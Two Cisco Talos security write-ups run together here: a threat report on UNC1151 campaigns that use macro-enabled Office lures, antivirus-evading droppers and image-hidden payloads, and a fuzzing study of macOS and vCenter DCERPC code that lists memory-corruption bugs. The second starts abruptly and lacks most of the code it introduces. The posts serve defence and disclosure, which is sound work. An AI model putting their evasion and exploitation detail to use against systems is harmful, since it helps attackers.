Cisco Talos has discovered a threat actor conducting several campaigns against government entities, military organizations and civilian users in Ukraine and Poland. We judge that these operations are very likely aimed at stealing information and gaining persistent remote access.
The activity we analyzed occurred as early as April 2022 and as recently as earlier this month, demonstrating the persistent nature of the threat actor. Ukraine’s Computer Emergency Response Team (CERT-UA) has attributed the July campaign to the threat actor group UNC1151, as a part of the GhostWriter operational activities allegedly linked to the Belarusian government.
The attacks used a multistage infection chain initiated with malicious Microsoft Office documents, most commonly using Microsoft Excel and PowerPoint file formats. This was followed by an executable downloader and payload concealed in an image file, likely to make its detection more difficult.
The final payloads include the AgentTesla remote access trojan (RAT), Cobalt Strike beacons and njRAT.
Ukrainian and Polish government and military organizations among those targeted
Talos first discovered a campaign in late April using several malicious files very likely intended for users in Ukraine, based on the content of the lure displayed when the target opens a malicious Microsoft Excel file. Talos eventually uncovered additional campaigns, including the two previously mentioned by Ukraine’s Computer Emergency Response Team (CERT-UA) and FortiGuard Labs researchers. The campaigns we discovered also involve malicious files intended for users in Poland.
The actor is focusing on Ukrainian and Polish government and military targets, based on the content of Excel and PowerPoint lures that include official-looking images and text. The purpose of these socially engineered lures is to convince the targeted users to enable macros, thereby allowing the execution chain to commence. This is the first stage of the attack, as demonstrated in the timeline below.
Timeline of the various attacks.Stages of the attack: The lure entices the user to enable macros that infect the system
Of the two file types, the PowerPoint files are more unusual in that they would not show any actual slides when opened, but would still execute the malicious VBA code, a finding consistent with CERT-UA’s analysis. Talos is currently researching whether the file’s failure to open is because they are intentionally corrupted. In any case, the VBA code still runs whenever the files are executed. Based on the files’ thumbnail images – the only content visible in the Windows Explorer window – the PowerPoint files imitate Ukraine’s Ministry of Defence and Poland’s Ministry of National Defence. The image below shows the thumbnail images indicating the campaign’s victims.
Thumbnail images show themes used by PowerPoint lures in these campaigns by the actor.
As opposed to the PowerPoint documents that did not display any slides in our testing environments, all Excel documents display legitimate-looking documents related to the targeted military organizations, or generic descriptions on how to enable VBA macro functionality in Excel. The VBA code in the Excel and PowerPoint-based campaigns displays a high level of similarity. The content of one of the Excel lures is shown below and contains the form for calculating salary payments (cash certificates) for soldiers of a specific military unit.
September 2022 campaign uses a lure that purports to be an official document from the Ukrainian Ministry of Defence.
The actor returned with a new campaign on July 4, 2023. The lure contains a payment instruction form containing VBA code, which appears to have been sent from the State Treasury Service of Ukraine. The content of the form is legitimate and targets Ukrainian government organizations, as seen in the image below. The form also contains legitimate macro code modified by the attacker to call malicious subroutines. It seems that the legitimate macro code is used to calculate some values in the spreadsheets, but the legitimate functions are changed to call the function that starts the infection process.
Ukrainian and Polish businesses, general users also targeted
The generic campaigns are aimed at various civilian targets in Poland and Ukraine, such as with Excel spreadsheet lures masquerading as value-added tax (VAT) return forms. Others include Excel spreadsheets that contain socially engineered instructions on how to enable macros in Excel so that the malicious VBA code can be executed. These two lures are shown below, respectively.
April 2023 campaign targeting business users in Poland with a fake VAT return form.
The majority of the Excel campaigns show some element of luring the user to enable macros in Excel with specific content using Ukrainian language.
Attacks start with VBA code to decode the next malware stage
All campaigns start with Microsoft Office documents, which are possibly sent to the targets as email attachments. In most cases, the file is an Excel spreadsheet containing a VBA macro, but we also found four instances where a malicious PowerPoint OLE2 (PPT) file was used, possibly indicating the actor's readiness to use file formats less commonly used in attacks.
VBA code is responsible for dropping the downloader executable or DLL.
The VBA code in all files is similar, with minor variations, where some functions serve a legitimate purpose (e.g., some functions for conversion of strings into numbers in Excel). The code is obfuscated, using an obfuscator script, based on the fact that some comments the actor didn’t strip are also obfuscated when the words written in the comments are not recognized as a part of the VBA syntax.
As seen below in the image, the obfuscator randomizes function and variable names but makes the mistake of not recognizing the comments (in green).
Randomized code comments show the code was likely obfuscated by an automated tool.
The code contains the next stage stored as hexadecimal encoded strings and is split into multiple strings so that an antivirus scan would not detect the content as potentially malicious. There are three main subroutines: the first is launched when the document is opened (e.g., Auto_Open, Workbook_Open), the second creates a randomly named dynamic loading library (DLL) file in the user’s temporary files folder, and the third creates a randomly named shortcut (LNK) file which contains code to run regsvr32.exe (or rundll32.exe) to launch the next stage.
The name of the shortcut file, depending on the campaign, is either randomly generated by a random string generator function or hardcoded in the macro code. In some campaigns, the random names are generated by a specific function in the VBA code. The screenshot above shows the function that generates a random string of variable length, specified in the function argument.
One subroutine calls the DLL dropper, LNK creation and launch routine.
Earlier campaigns used an executable downloader, while the later ones used DLLs for the next stage.
In some instances, two randomly generated bytes are added to the end of the file, which invalidates the detection of the dropped files using simple checksum-based techniques.
In some cases randomly generated bytes are added to the end of the dropped file.
The July 2023 campaign has a slightly modified infection chain. The dropper first creates a shortcut file but the dropped DLL is launched with rundll32.exe instead of regsvr32.exe. Once the initial export is called (in this case, the legitimately named function IETrackingProtectionEnabled), the downloader will copy itself and call regsvr32.exe with parameters “/u /s” to automatically call the function for unregistering COM servers DllUnregisterServer.
Eventually, when the DLL is copied into its final path, rundll32.exe is used to call the exported function SetQueryNetSessionCount, which downloads the next stage. The final payload of the July 2023 campaign is njRAT, which increases our confidence that the threat actor's goals are information stealing and remote control of the targeted systems. NjRAT is an open-source remote access trojan (RAT) whose source code is freely available and is used by commodity actors and APTs, making the process of attribution more difficult.
July 2023 campaign's main malicious VBA function is Data_Open.
Obfuscated downloader retrieves an image containing the payload
The next stage is a Portable Executable (PE) file, an executable or a DLL file. ConfuserEx obfuscator, an obfuscator that is very commonly used by malicious actors to obfuscate .NET code, is used with various levels of obfuscation, anti-tampering and anti-debugging, which makes the unpacking more difficult for malware researchers. CERT-UA named the downloader PicassoLoader.
All downloaders attempt to download an image file from a URL. Depending on the campaign, the final payload or the third intermediate stage is appended as an encrypted binary blob to the end of the image. The image will still display in viewers but the downloader will extract the executable content using the appropriate decryption key and the decryption algorithm.
The encrypted next-stage blob is appended to the end of a JPEG image.
The downloader uses managed AES (Rijndael algorithm) to decrypt the appended data which is then reflectively loaded as a byte array using the Assembly.Load function as seen below. The decryption key and the initialization vector are either stored as obfuscated strings in the body of the downloader or calculated as an MD5 checksum of the downloaded image file.
The downloader first decrypts the third stage and then loads it using the Assembly.Load function.
The code to download the next stage is in constant development. In earlier versions, the call to the Assembly.Load function is fairly easy to spot. In the later campaigns, the actor has chosen to add a layer of obfuscation and use the RuntimeBinder.Binder functionality to find and invoke functions for downloading, decryption and loading.
Later variants of the downloader use Binder to invoke functions.
Earlier variants use RijndaelManaged implementation of AES decryption routine to decrypt the next stage, while the variant from April 2023 uses a simplified variant of RC4 to decrypt the payload appended to an image file. The variant from July 2023 returns to RijndaelManaged.
Managed Rijndael is used to decrypt the third stage.Simplified RC4 is used to decrypt the third stage in April 2023.
Most of the URLs and the infrastructure were not accessible at the time of analysis, although we managed to obtain images from three campaigns to recreate the infection chain. Our analysis triggered exceptions in the decryption process, so it is possible that the image files we obtained were corrupted or that the implementation of decryption in some of the downloaders was incorrect.
Nevertheless, previous analyses by CERT-UA and FortiGuard Labs indicate that final payloads, which included AgentTesla and Cobalt Strike, were used for information theft and remote access to infected systems.
July 2022 image with the next-stage campaign targeting Ukrainian government organizations.Payload-carrying image used in September 2022 campaign.Payload-carrying image used in April 2023 campaign.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The following ClamAV signatures are applicable to this threat:
Doc.Malware.Corona-10003975-0
Win.Downloader.DotNETEncryptedJPEG-10006210-0
Win.Downloader.DotNETEncryptedJPEG-10006211-0
Win.Downloader.DotNETEncryptedJPEG-10006212-0
Win.Downloader.DotNETEncryptedJPEG-10006213-0
Win.Downloader.DotNETEncryptedJPEG-10006214-0
Win.Downloader.DotNETEncryptedJPEG-10006215-0
Win.Downloader.DotNETEncryptedJPEG-10006216-0
Win.Downloader.DotNETEncryptedJPEG-10006217-0
Win.Downloader.DotNETEncryptedJPEG-10006218-0
Win.Downloader.DotNETEncryptedJPEG-10006219-0
Win.Downloader.DotNETEncryptedJPEG-10006220-0
Win.Downloader.DotNETEncryptedJPEG-10006221-0
Win.Downloader.DotNETEncryptedJPEG-10006222-0
Img.Dropper.Agent-10006223-0
Img.Dropper.Agent-10006224-0
Xls.Dropper.Corona-10006204-0
Xls.Dropper.Corona-10006205-1
Xls.Dropper.Corona-10006207-0
Xls.Dropper.Corona-10006205-1
Ole2.Dropper.Corona-10006206-1
Xls.Dropper.Corona-10006207-1
Ole2.Dropper.Corona-10006209-0
Win.Trojan.Generic-6417450-0
Indicators of Compromise (IOC)
Indicators of Compromise associated with these threats can be found here.
Cisco Talos discovered 12 memory corruption vulnerabilities in MSRPC implementations on Apple macOS and VMWare vCenter. - Seven vulnerabilities affect Apple macOS only. - Two vulnerabilities affect VMWare vCenter. - Three vulnerabilities affect both.
MSRPC implementations on macOS and vCenter are based on the same DCERPC codebase, forked at different times and modified to suit different use cases
Uncovered issues fall into use-after-free, buffer-overflow, information leak and denial-of-service vulnerability classes. Some of these could be combined to achieve remote code execution or privilege escalation.
Approaching a target’s attack surface layer by layer, we show vulnerabilities that stem from single packet parsing, temporal vulnerabilities that require multiple interacting sessions and complex vulnerabilities that can only be reached by performing concrete and well-formed RPC calls.
DCE/RPC stands for “Distributed Computing Environment/Remote Procedure Calls.” which was a standardized protocol for implementing Remote Procedure Call (RPC) mechanisms. It is kept relevant today by the fact that Microsoft’s RPC mechanism used throughout the Windows ecosystem is closely based on DCE/RPC specifications. In contrast, DCERPC is an open-source implementation compatible with Microsoft RPC (MSRPC) specifications. We will use DCERPC to refer to the open-source implementation and MSRPC to refer to the protocol specification.
MSRPC defines message syntax and sequence used for establishing RPC communication which is usually performed over TCP connections, SMB connections, named pipes, sockets and other channels. A client wishing to perform a remote procedure call on an exposed service talks to the RPC server over the available channel to bind to the service and call a predefined method. This is performed by exchanging a series of BIND/BIND_ACK and REQ/RESP protocol data units (PDUs). RPC services are identified by their UUID, and specific methods/functions that can be invoked or called remotely are identified by their operation numbers (opnums).
Remotely callable procedures can take arguments and return results. MSRPC prescribes how these values or data structures are serialized and deserialized.
When developing an RPC service, exposed operations, their inputs and outputs and related data structures are specified in a domain-specific language called Interface Definition Language (IDL). IDL files for a service serve as a base for generating service boilerplate code via an IDL compiler.
Management Remote Interface IDL is one such example:
[uuid(afa8bd80-7d8a-11c9-bef4-08002b102989), version(1)]
interface mgmt
{
import "dce/rpctypes.idl";
/*
* R P C _ _ M G M T _ I N Q _ I F _ I D S
*/
[idempotent]
void rpc__mgmt_inq_if_ids
(
[in] handle_t binding_handle,
[out] rpc_if_id_vector_p_t *if_id_vector,
[out] error_status_t *status
);
/*
* R P C _ _ M G M T _ I N Q _ S T A T S
*/
[idempotent]
void rpc__mgmt_inq_stats
(
[in] handle_t binding_handle,
[in, out] unsigned32 *count,
[out, size_is (*count)] unsigned32 statistics[*],
[out] error_status_t *status
);
The above code excerpt specifies a UUID of afa8bd80-7d8a-11c9-bef4-08002b102989 and two methods (rpc__mgmt_inq_if_ids and rpc__mgmt_inq_stats) as examples. Both defined methods have parameters prefixed by either in, out or both, specifying whether the parameter is an input argument or a return value.
For an RPC client to invoke one of these methods, it needs to send a BIND request with the specified UUID of afa8bd80-7d8a-11c9-bef4-08002b102989 and then an RPC call request with a specified opnum. Opnums correspond to methods in the IDL and are sequential.
Usual services provided over MSRPC on Windows platforms are workstation and directory services, LSAS, NETLOGON and numerous others implemented by third parties. Third-party service implementation will rely on MSRPC libraries on Windows, code stubs will be generated via an IDL file and the actual functionality will be implemented manually. When viewed this way, the attack surface of an exposed service consists of code that handles the transport layer (ex. named pipes over SMB), code that handles RPC requests and response messages and service invocation and code that implements actual service functionality. We will examine these in the context of vCenter and macOS.
VMWare’s use-case
VMWare vCenter is a popular target for attackers, so we naturally searched for services accessible from the local network. vCenter employs the Lightwave project that provides a unified framework for security, authentication, certificate management, etc. Upon closer inspection, the implemented services seemed particularly interesting. Specifically, the VMware Certificate Management Service (vmcad port 2014), the VMware Directory Service (vmdird port 2012) and VMware Authentication Framework (vmafdd port 2020), accessible from the local network by default.
As evident from their names, these services appear to implement security-critical functionality so we looked deeper into their implementation. Even though we found each service running as its own user for privilege separation, it would be catastrophic for an attacker to insert their own certificate in the Certificate Management Service (vmcad, for example).
Upon closer inspection, it became apparent that these services implemented an RPC interface over the network exposing most of their functionality behind authentication. As a result, we were initially stymied in our efforts to assess the reachability of interesting code from an unauthenticated attacker's perspective. However, we quickly found that these services used DCERPC to enable network functionality and specifically an implementation from the Likewise-Open library. This is low-level networking code parsing packets from the network before authentication and became our focus for the rest of our research.
macOS use-case
We’ve previously performed code audits on an SMB server built into macOS and uncovered several vulnerabilities that have since been patched. During the initial investigation into MSRPC services on VMWare vCenter, we quickly noticed that it shares a codebase with macOS implementation and we decided to further investigate.
On macOS, RPC services are hosted by rpcsvchost system service which is governed by launchd. The rpcsvchost service relies heavily on the private DCERPC.framework located in /System/Library/PrivateFrameworks/. DCERPC.framework is open-source and can be found in Apple’s open-source software repositories. On macOS DCERPC.framework and rpcsvchost itself, support UNIX sockets as a communication channel. When an RPC service is being started, a socket is created in /var/rpc/:
$ ls -lR /var/rpc/
total 0
drwxr-xr-x 6 root wheel 192 Nov 29 15:23 ncacn_np
drwxr-xr-x 6 root wheel 192 Nov 29 15:23 ncalrpc
/var/rpc//ncacn_np:
total 0
srw-rw-rw- 1 root daemon 0 Nov 29 15:23 lsarpc
srw-rw-rw- 1 root daemon 0 Nov 29 15:23 mdssvc
srw-rw-rw- 1 root daemon 0 Nov 29 15:23 srvsvc
srw-rw-rw- 1 root daemon 0 Nov 29 15:23 wkssvc
/var/rpc//ncalrpc:
total 0
srw-rw-rw- 1 root daemon 0 Nov 29 15:23 NETLOGON
srw-rw-rw- 1 root daemon 0 Nov 29 15:23 lsarpc
srw-rw-rw- 1 root daemon 0 Nov 29 15:23 srvsvc
srw-rw-rw- 1 root daemon 0 Nov 29 15:23 wkssvc
In the above listings, we can see two endpoints, ncacn_np and ncalrpc which contain services. The first is for named pipes available over SMB, and the second is for local-only RPC services.
Services themselves are implemented as bundles and are located in /usr/lib/rpcsvc:
[:/usr/lib/rpcsvc ]
$ ls -l
total 2248
-rwxr-xr-x 1 root wheel 237440 Oct 13 01:06 dssetup.bundle
-rwxr-xr-x 1 root wheel 169920 Oct 13 01:06 echosvc.bundle
-rwxr-xr-x 1 root wheel 868864 Oct 13 01:06 lsarpc.bundle
-rwxr-xr-x 1 root wheel 368176 Oct 13 01:06 mdssvc.bundle
-rwxr-xr-x 1 root wheel 1057488 Oct 13 01:06 netlogon.bundle
-rwxr-xr-x 1 root wheel 959936 Oct 13 01:06 srvsvc.bundle
-rwxr-xr-x 1 root wheel 304736 Oct 13 01:06 wkssvc.bundle
Each of the bundles is built from IDL-generated skeleton code and actual service implementation.
The default services are present to support necessary Active Directory operations for macOS instances that are joined into a domain network. All the above services exist on Windows platforms and are well documented, except mdssvc, which is Apple-specific and implements spotlight search.
From an attacker's perspective, rpcsvchost is running with root privileges (although it is sandboxed). A local malicious user can connect to exposed UNIX sockets and attempt to exploit vulnerabilities for privilege escalation. Services aren’t directly exposed to a network but can be reached through SMB, adding a potential remote attack surface. Authentication requirements for named pipes access depend on configuration. By default, authentication is required.
Peering into the code
DCERPC library represents our main attack surface and basic familiarity with the code layout and important entry points are invaluable when it comes to fuzzing.
The library relies heavily on the usage of threads and dispatches events to be handled by appropriate functions. The main entry point for processing incoming data is prescribed in the standard and is implemented as rpc__cn_network_receiver in dcerpc/ncklib/cnrcvr.c:
This routine constitutes the top-level receiver thread (both client and server) and is invoked by "thread create" in the "association lookaside alloc" routine to process incoming packets.
When an incoming packet is received, the following code is reached:
The function receive_dispatch is actually responsible for parsing messages and dispatching further handlers. There are several things of note here. First, the codebase relies heavily on macros, such as RPC_CN_STATS_INCR. Second, a large number of global variables is used to track server state, number of connections and other statistics. These are mostly allocated in uninitialized memory.
Anti-fuzzing code patterns
While not intentional, several code patterns used throughout this codebase make fuzzing and root cause analysis if not difficult then slightly awkward. One of them is heavy reliance on macros to manage threads. This leads to situations where a crash caught in the debugger will have very limited context due to a very short call stack. This also has implications for tracing and code coverage analysis. Notice that the above code implements pseudo-exception handling by employing try/catch blocks made as macros. These are also part of MSRPC specification:
#define DCETHREAD_TRY RpcTryExcept
The RpcTryExcept function is provided by the user of the library and differs from platform to platform.
A second impediment to fuzzing lies in the way error reporting is handled by the code. For example:
The function rpc_dce_svc_printf is used to either print or log an error raised by the exception. The fifth argument svc_c_sev_fatal | svc_c_action_abort specifies how the error is to be handled. In this case, the error is fatal and the service is forcefully destroyed which a debugger would consider a crash. This is a very unfortunate anti-pattern that easily leads to denial-of-service conditions. For fuzzing to be successful, these fatal exceptions need to be patched out.
vCenter Services implementation
As a simple overview for the VMware vCenter, a service that wants to use DCERPC needs to create an IDL file that describes the RPC interface, namely, the functions that need to be exposed to external clients and their corresponding arguments. As an intermediate build step for the service, an IDL compiler will compile the IDL file to standard C header and implementation files that will be used for marshaling/unmarshaling parameters (marked as [in] for input and [out] for output) and proper stubs for the actual function calls implementing the service functionality. Here's a relevant excerpt from the service definition for the Certificate Management Service vmcad:
For each function declared in the interface above, an op_ssr() function is auto-generated and responsible for unmarshaling the parameters to the proper type, calling the relevant RPC function, and finally marshaling the return values and sending the results to the client. Here we see the op0_ssr() stub for RpcVMCAGetServerVersion() of vmcad (edited for clarity):
And here we see the actual implementation of RpcVMCAGetServerVersion():
macOS services implementation
As previously mentioned, individual services on macOS are implemented as bundles in /usr/lib/rpcsvc. Disassembling and casually reverse engineering these bundles reveals patterns that help navigate the code. Reverse engineering can be augmented by structure definitions from open source DCERPC codebase, as well as from studying IDL files from known services.
A typical service implements a *_load function that performs initialization and registers the service with rpcsvchost. The binaries contain data structures that describe interfaces:
These can then be followed to find actual operation implementations:
There are four methods that this particular service implements. These are (presumably) defined in Apple’s proprietary IDL for mdssvc service along with their inputs and output. An overview of these is useful because some aren’t implemented, simply return errors, or are stubs and can be skipped in testing:
Looking at it from another way, rpcsvchost will handle the parsing of the incoming request and dispatch an appropriate procedure call into mdssvc by its opnum, not by procedure name. In the list of functions inside mdssvc.bundle, we can see the following:
_op0_ssr
_op1_ssr
_op2_ssr
_op3_ssr
These are operation stubs generated from the IDL that actually call into concrete procedure implementations. These can be fairly complex, as they are tasked with unmarshaling incoming packet data into arguments and marshaling response data.
Familiarity with these is helpful when performing root cause analysis and when studying code coverage.
An interesting side-effect of how these services are implemented on top of UNIX sockets is that we can access any service through any UNIX socket as long as they are both available and reachable. Since they are just sockets, services can be interacted with using standard tools, for example:
Since the Lightwave project and the Likewise-Open library are readily available on GitHub with relatively recent commits, we downloaded the code and attempted to compile it with full debug symbols and AddressSanitizer enabled to greatly enhance our hunt for vulnerabilities. Unfortunately, as is almost always the case for open-source software, it is easier said than done since specific versions of libraries and toolchains are usually needed. We successfully used HyperMake and Docker as documented to build the software, however, this would hinder our research velocity in the long run so we set up a Photon OS virtual machine. Photon OS is a GNU/Linux distribution provided by VMWare and is also the base for the VMware vCenter image. We used Photon OS version 3.0 for our tests.
Following a standard installation and after making sure the VM had access to the internet with proper DNS settings, we had to change the URLs for the software repo that would enable us to install packages easily to the Photon VM:
cd /etc/yum.repos.d
sed -i 's/dl.bintray.com\/vmware/packages.vmware.com\/photon\/3.0/g' *.repo
echo distroverpkg=photon-release >> /etc/tdnf/tdnf.conf
tdnf makecache && tdnf update && tdnf upgrade
We can use the lightwave/support/toolchain/docker/photon3/Dockerfile as a reference to install all build dependencies. Finally, we can build Lightwave:
cd lightwave/build/
./bootstrap.sh && make -j8
This would compile Lightwave with the distribution provided Likewise-Open, but we want to build the library on our own to get the full benefits of symbols and AddressSanitizer. So, we downloaded Likewise-Open:
After changing the hardcoded -Werror to -Wno-error in various Makefiles that would prevent us from building Likewise-Open on a reasonably modern compiler, we are ready to compile:
Although ASAN can be used with gcc, we opted to use clang for our tests. Enabling ASAN was relatively straightforward, although we had to tweak the compiler parameters to successfully compile:
Note that we disabled the memory leak detection for ASAN. During the compilation of the Likewise-Open library, as an intermediate step, the dceidl binary is built and used to compile the IDL files to C code. It appears to have a memory leak and ASAN would terminate execution halting the build process and we disabled leak detection as it is not relevant to our interests. Additionally, we removed the FORTIFY_SOURCE compile flag since ASAN does not play well with source fortification.
Fuzzing with Mutiny
Since we want to fuzz networking code which can always be tricky to handle we opted for a simple fuzzing setup to accelerate our research while we went deeper into the code. We decided to use Mutiny which is a network fuzzer designed for easy setup that gets network packets as inputs, mutates them through Radamsa and finally sends them to the network server.
to get initial seeds for fuzzing we essentially needed a client to talk to one of the binaries and capture the sent packets. As a target, we chose vmcad, the Certificate Management Service since it was easier to set up. As a client we used Impacket which includes some very useful scripts to talk to DCERPC endpoints. We used Impacket to exercise the functionality of DCERPC, like performing RPC calls, doing service discovery, etc., and captured the packets with tcpdump. Then, we fed the packet capture to Mutiny, which started our simple fuzzing campaign. Although our fuzzing setup at this point was purely black-box, without getting any code coverage feedback, we still managed to get some very good initial results with little effort.
Fuzzing with AFL++
To fuzz the target effectively and in-depth, we decided to use AFL++, a fork of AFL including many useful improvements from the community. Although fuzzing traditional targets that take input from a file and exit cleanly is the perfect scenario for AFL, the case is different for network servers. The standard procedure is to use another framework like Preeny to hook functions that take input from the network and take input from a file instead, although the success rate varies from target to target. Another option is to use a framework like AFL-Net for fuzzing network applications which at this point seems hardly up to date with the rest of the tooling. For these reasons, we opted to patch the Likewise-Open code to get data from stdin instead of the network.
After delving into the code and doing some simple modifications for testing one thing was readily apparent. There is a large portion of the networking code that can't be disabled easily. The library, as expected, performs a large number of system calls relating to sockets, doing the bind()/listen()/accept() calls, then doing a select() on the open sockets to know when there is data available from the network, etc., but there is a large part of the application logic dealing with the network that great effort and time would have to be spent to make the library run without it.
To maximize our time investment, we patched the select() code that waits for data from the network to wait for data from stdin instead. Here, we see the relevant code in dcerpc/ncklib/comnlsn.c:
Per the select() documentation, we create a new fd_set containing only the file descriptor for stdin and we pass that to select() or, here, the equivalent dcethread_select(). Since the library uses multiple threads, we simply set the global already_select to prevent execution from continuing after a successful packet was received.
We also make another modification by setting a new field in the internal representation of sockets in the library:
The new afl_fd_shim will make it easier to distinguish for which socket we need to read from stdin instead of the network and also help us skip some code that would halt the execution otherwise.
In dcerpc/ncklib/comsoc_bsd.c, we distinguish the relevant network socket we want to replace based on the port number. Here, the 2014 is the port that vmcad listens on.
Then, we need to read from stdin when the application wants to read from the network. We use readv() to read from stdin (file descriptor 0) since it uses the same iovec type inputs as recvmsg():
Finally, by using the following options during the build of Likewise-Open and Lightwave for AFL++:
afl-fuzz -M main -i inputs -o outputs -- ./bin/vmcad
Scaling AFL++
Ideally, we want to fuzz with multiple processes to get the full potential of our hardware and get better results. However, the shortcut we took earlier to include all the networking code to make the application work correctly is an obstacle in scaling since the application wants to bind to port 2014. By using multiple processes, every instance of the application would attempt to bind to port 2014 and as a result, only the first one would successfully bind, while the other processes could continue and, finally, exit. Although we could use a scheme to bind a random port for every process, guaranteeing a non-collision for ports seems rather cumbersome. If every process did a bind on a different network interface it would be very helpful for our purposes.
Enter Linux namespaces. By using a different namespace for every process effectively a new network view of the system is created with different interfaces and routing tables, perfect for our needs. Since we have access to the source code, we can actually enter a new namespace by using the unshare(CLONE_NEWNET) call. Also note that in the new namespace created, the loopback interface is not set up, so we actually have to initialize it properly.
Now, for every process spawned by AFL, a new network namespace is created with its own loopback interface and the application can happily bind to it. This worked well for a few seconds of fuzzing, but we noticed that the CPU was in the kernel context for most of the time imposing a great slowdown to fuzzing and effectively halting it. Creating and destroying thousands of network namespaces per second does not appear to be a very popular use case.
All is not lost, however. By default, AFL does a fork() of the initial process just before main() to spawn a new process for every test case. We can actually change the location of the fork() by calling __AFL_INIT() manually in our target after the new namespace is created. As a result, a new network namespace is created first and then AFL does a fork(). A test case is processed by the newly spawned target process (that binds to the network port), the target process exits (and the port becomes free) and then a new target process is spawned anew. In essence, we can now use AFL per the documentation to scale our fuzzing to N cores, with only N network namespaces, created and destroyed, thankfully, only once.
Fuzzing macOS Version
Specifics of the macOS environment, and its use of DCERPC.framework, made our fuzzing efforts different from ones performed against vCenter implementation. In addition to reverse-engineering of proprietary binaries, we’ve employed a number of additional tools, such as Impacket, Frida, and Address Sanitizer.
Impacket modifications
Impacket is a de-facto standard Python library for implementing scripts that deal with low-level Microsoft network protocols. It includes a low-level implementation of MSRPC among other things and has been invaluable in testing and writing proof of concepts.
Because the macOS-specific implementation of MSRPC relies on UNIX sockets instead of more usual channels, we’ve had to modify Impacket to make it work with rpcsvchos.
The modification is relatively straightforward and it piggybacks on code that handles named pipes, but it enables us to interact with implemented services via existing Impacket scripts. For example, we can use rpcmap.py to list available services and their methods:
Additionally, we modified Impacket to dump outgoing and incoming messages as binary files which can be used as seeds for fuzzing.
Using the source
The codebase used by DCERPC.framework on macOS seems pretty old and stable and the source code to it is published by Apple. It is possible to make a custom debug build of it and use it in place of the original one with the original rpcsvchost binary. The rpcsvchost binary itself and service bundles aren’t open-sourced and cannot be rebuilt, but the majority of interesting code resides in DCERPC.framework.
The first step was to modify the source and patch out obvious aborts and forceful termination of the service whenever an out-of-shape packet was received. Second, the modified source can be compiled with Address Sanitizer enabled, which greatly increases the chances of catching memory corruption issues. Finally, having access to source code makes patching uncovered bugs trivial, so the fuzzer doesn’t get stuck finding them again and again. Building the code is fairly simple:
Then, after disabling the instance of rpcsvchost started by launchd, we can use DYLD library injection to implant our own copy of the DCERPC framework in place of the original one:
A debugger can then easily be attached to rpcsvchost and can be interacted with using standard tools.
We used Frida to make a rudimentary coverage-guided fuzzer, similar to what we showed in the macOS SMBd research writeup. By hooking the receive_dispatch function and then tracing code coverage for DCERPC.framework binaries, as well as targeted service bundles (such as netlogon.bundle), we can have a fairly fast in-memory coverage-guided fuzzer.
Vulnerabilities discovered
During the course of this research, we have uncovered 12 distinct vulnerabilities, seven of which affect macOS only, two that affect only vCenter and three that affect both. The uncovered vulnerabilities fall into different classes such as buffer overflows, use-after-frees and information leaks. Two vulnerabilities can lead to denial of service conditions, one of which can bring down the whole system, while two others can divulge the contents of uninitialized memory which can aid in bypassing exploitation mitigations. And finally, a total of eight vulnerabilities can result in controlled out-of-bounds memory modification.
Improper calculation of authentication trailer pointer
This vulnerability can lead to denial of service and affects both VMWare vCenter and Apple macOS.
Similar to the previous bug, packet data is used in a pointer calculation without range validation. An out-of-bounds pointer is subsequently used for further operations. The vulnerability is limited to a denial of service because the potentially invalid pointer is validated prior to it being used for memory modification:
Unlike SWAB_IN_PLACE32, SWAB_INPLACE_16 actually validates that the pointer falls inside the packet. Nevertheless, dereferences of the invalid pointer can still lead to access violation and denial of service.
Apple DCERPC packet stats buffer overflow vulnerability
During the lifetime of the process, the DCERPC library keeps track of a number of key statistics. There exists a vulnerability where values from incoming packets are directly used as indices in a table:
Above code shows how packet type value that comes directly from attacker-controlled data is used as an index into an array without validation. This particular array is of fixed size and the vulnerability can result in out-of-bounds memory modification. Depending on memory layout, other sensitive global data structures will be nearby and their modification can adversely affect the process state and aid in further exploitation. This vulnerability only affected macOS.
Apple DCERPC allocation hints at uninitialized memory disclosure vulnerability
In protocol specifications, optional fields often result in uninitialized memory leaks where previous, miscellaneous data gets included in a packet structure that should otherwise be zeroed out. These types of vulnerabilities can be useful in defeating probabilistic exploitation mitigations such as address space layout randomization.
In this instance, an optional 4-byte alloc_hint field can contain data or memory pointers from previous uses of that particular chunk. Depending on memory layout and service usage history leaked bytes can contain different data, like sensitive information from other requests, pointers or heap metadata.
This vulnerability affected macOS only and is another example of a classic integer overflow leading to undersized memory allocation followed by a buffer overflow. An unvalidated arithmetic operation is used to calculate the size of a buffer allocation. Due to a possible integer overflow, an undersized buffer can be allocated:
In the above code, new_cound is used in multiplication which can result in an integer wraparound. Immediately after allocation, the undersized buffer is used in a call to memcpy potentially resulting in a heap-based buffer overflow:
To trigger this vulnerability, a very large number of simultaneous connections would be needed because new_count is only incremented in increments of RPC_C_ASSOC_GRP_ALLOC_SIZE (which is 10). However, we can exploit another vulnerability, TALOS-2022-1679, to trigger this vulnerability with a single network packet.
Apple DCERPC zero length BIND packet infinite loop
Infinite loop vulnerabilities would usually be limited to resource exhaustion and denial-of-service attacks. However, as already outlined in TALOS-2022-1676, this particular one can be useful in exploiting a different vulnerability. The vulnerability lies in handling fragmented packets where, through a convoluted series of calculations, packet-parsing code can be made to parse the same part of the packet repetitively in an infinite loop.
Essentially, when figuring out how many bytes are expected, packet data is trusted and the code can be put into a state where zero bytes are being consumed, but parsing continues. This constitutes an infinite loop that has other side effects that can be abused.
This vulnerability affected Apple macOS and VMWare vCenter. An uninitialized part of a large data structure that holds call context can end up being used in a sanity check. When cleaning up allocations, the following piece of code is often encountered in DCERPC:
